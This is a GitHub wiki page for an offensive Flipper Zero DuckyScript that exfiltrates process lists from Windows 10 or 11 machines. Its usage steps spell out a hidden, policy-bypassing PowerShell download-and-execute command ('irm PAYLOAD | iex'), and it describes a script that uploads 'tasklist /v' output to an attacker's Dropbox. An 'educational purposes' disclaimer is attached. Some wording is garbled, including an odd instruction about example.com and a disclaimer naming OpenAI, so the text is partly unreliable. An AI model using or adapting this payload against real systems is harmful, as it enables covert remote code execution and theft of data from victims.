Exfiltrate Process Info Windows - aleff-github/my-flipper-shits GitHub Wiki

DuckyScript Documentation

This DuckyScript is a tool for exfiltrating process information from a Windows 10 or 11 system. It was authored by Aleff, and is version 1.0. The category is exfiltration.

Script Information

  • Title: Exfiltrate Process Info
  • Author: Aleff
  • Version: 1.0
  • Category: Exfiltration
  • Target: Windows 10-11

Requirements

Before using this tool, you will need the following:

  • An internet connection
  • A Dropbox webhook

Usage

The following steps explain how to use this DuckyScript to exfiltrate process information:

  1. Ensure that you have met the requirements listed above.
  2. Define the payload by replying to example.com with your link. The payload should be ExfiltrateProcessInfo.ps1.
  3. Wait for 2 seconds.
  4. Press the Windows key and the R key (GUI r).
  5. Wait for 250 milliseconds.
  6. Type powershell -w h -ep bypass irm.
  7. Type PAYLOAD.
  8. Type | iex.
  9. Press the Enter key.

The tool will then exfiltrate the process information from the target system to your Dropbox webhook.

Disclaimer

This tool is provided for educational purposes only. Use it at your own risk. The author and OpenAI assume no responsibility for any misuse or damage that may result from using this tool.

PowerShell Documentation

This PowerShell function is a tool for exfiltrating process information from a Windows system.

Usage

To use this function, you can simply call the ExfiltrateProcessInfo function. The function will do the following:

  1. Create a temporary file to store the process information.
  2. Run the tasklist /v command to get the process information and save the output to the temporary file.
  3. Define the Dropbox file path as /tasklist_output.txt.
  4. Set the Dropbox access token as an empty string.
  5. Get the content of the temporary file.
  6. Set the upload URL as https://content.dropboxapi.com/2/files/upload.
  7. Set the headers required for the Dropbox API call, including the access token, Dropbox API arguments, and content type.
  8. Use Invoke-RestMethod to upload the file content to Dropbox.

Disclaimer

This tool is provided for educational purposes only. Use it at your own risk. The author and OpenAI assume no responsibility for any misuse or damage that may result from using this tool.